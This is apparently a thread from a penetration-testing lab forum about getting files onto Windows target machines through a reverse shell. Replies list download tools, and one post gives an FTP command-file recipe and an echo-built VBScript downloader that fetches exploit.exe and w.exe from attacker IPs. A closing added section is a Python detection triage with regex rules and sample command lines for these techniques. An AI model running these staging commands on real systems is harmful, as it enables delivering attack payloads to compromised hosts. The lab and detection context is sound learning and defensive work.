copying files to windows

Hi,

I am trying to move machines from my device to Windows target machines (Arctic, Optimum) but I don’t get any response from the reverse shell. I don’t want to use Metasploit/Meterpreter and I get a simple shell. I tried to use powershell to get file from my http server as well as ftp and smb but after powershell.exe or ftp.exe the shell becomes unresponsive. When I echo ps1 content to a file and run it with powershell.exe, the same happens. On my http server I don’t see any file requested.

Is there any other way to transfer files to these machines from Windows shell?

Smbserver.py, certutil, bitsadmin, nc.exe, batch scripts, wget.exe

> @DaChef said:
>
> Smbserver.py, certutil, bitsadmin, nc.exe, batch scripts, wget.exe

In addition to all these things, there is a good blog post covering this part: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md

also check out this recommendation

https://sushant747.gitbooks.io/total-oscp-guide/transfering_files_to_windows.html

This is a vbscript that is used in the OSCP course material

Thanks guys for your hints! I figured out that it is best to create a command file (e.g. for FTP: echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME) and execute ftp with it. Also vbs is good for PoSh-less machines like WS2003:

echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") > p.vbs
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> p.vbs
echo xHttp.Open "GET", "http://10.10.14.31/w.exe", False >> p.vbs
echo xHttp.Send >> p.vbs
echo[ >> p.vbs
echo with bStrm >> p.vbs
echo .type = 1 >> p.vbs
echo .open >> p.vbs
echo .write xHttp.responseBody >> p.vbs
echo .savetofile "c:\windows\temp\pawel\w.exe", 2 >> p.vbs
echo end with >> p.vbs

ach, LOLBINs with download capability, like certutil, can help too :slight_smile:

> @pawellakomski said:
>
> Thanks guys for your hints! I figured out that it is best to create a command file (e.g. for FTP: echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME) and execute ftp with it. Also vbs is good for PoSh-less machines like WS2003:
>
> echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") > p.vbs
> echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> p.vbs
> echo xHttp.Open "GET", "http://10.10.14.31/w.exe", False >> p.vbs
> echo xHttp.Send >> p.vbs
> echo[ >> p.vbs
> echo with bStrm >> p.vbs
> echo .type = 1 >> p.vbs
> echo .open >> p.vbs
> echo .write xHttp.responseBody >> p.vbs
> echo .savetofile "c:\windows\temp\pawel\w.exe", 2 >> p.vbs
> echo end with >> p.vbs

This is very time consuming and not convenient at all. Use it when every other option isn’t usable!
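
Seen from the monitoring side, the methods discussed in this thread leave recognizable process command lines. The following is an added example, not code from any post in the thread: a small triage over process-creation records that flags hosts where a script or command file is assembled with echo and then run, or where one of the named tools is started with a URL. The rule names, the `triage` helper and the sample records are constructed for illustration.

```python
import re

# Constructed process-creation records (host, command line); not from the thread.
SAMPLE_EVENTS = [
    ("WS01", r'cmd.exe /c echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") > p.vbs'),
    ("WS01", r'cmd.exe /c echo .write xHttp.responseBody >> p.vbs'),
    ("WS01", r'cmd.exe /c echo .savetofile "c:\windows\temp\x\w.exe", 2 >> p.vbs'),
    ("WS01", r'cscript.exe p.vbs'),
    ("WS02", r'cmd.exe /c echo open 192.0.2.10 >> cmds.txt'),
    ("WS02", r'ftp.exe -s:cmds.txt'),
    ("WS03", r'certutil.exe -hashfile C:\Users\a\report.docx SHA256'),  # routine use
    ("WS03", r'bitsadmin.exe /list'),                                   # routine use
    ("WS04", r'certutil.exe [options elided] http://192.0.2.10/w.exe w.exe'),
]

# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("echo-built-script", re.compile(r'\becho\b.*>>?\s*\S+\.(vbs|ps1|bat|txt)\b', re.I)),
    ("vbs-http-downloader", re.compile(r'Microsoft\.XMLHTTP|Adodb\.Stream|\.savetofile|responseBody', re.I)),
    ("ftp-command-file", re.compile(r'\bftp(\.exe)?\s+.*-s:', re.I)),
    ("lolbin-with-url", re.compile(r'\b(certutil|bitsadmin|powershell)(\.exe)?\b.*\b(https?|ftp)://', re.I)),
    ("script-host-run", re.compile(r'\b(cscript|wscript)(\.exe)?\s+\S+\.vbs\b', re.I)),
]

def match_rules(cmdline):
    """Names of all rules whose pattern occurs in one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def triage(events):
    """Return {host: sorted rule names} for hosts showing a transfer pattern.

    Rules are correlated per host by co-occurrence; event order is not checked.
    """
    hits = {}
    for host, cmdline in events:
        for name in match_rules(cmdline):
            hits.setdefault(host, set()).add(name)
    findings = {}
    for host, names in hits.items():
        staged_vbs = {"echo-built-script", "vbs-http-downloader", "script-host-run"} <= names
        staged_ftp = {"echo-built-script", "ftp-command-file"} <= names
        if staged_vbs or staged_ftp or "lolbin-with-url" in names:
            findings[host] = sorted(names)
    return findings

if __name__ == "__main__":
    for host, names in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, ", ".join(names))
```

WS03 is not reported: certutil and bitsadmin appear there without a URL, so tool names alone do not raise a finding.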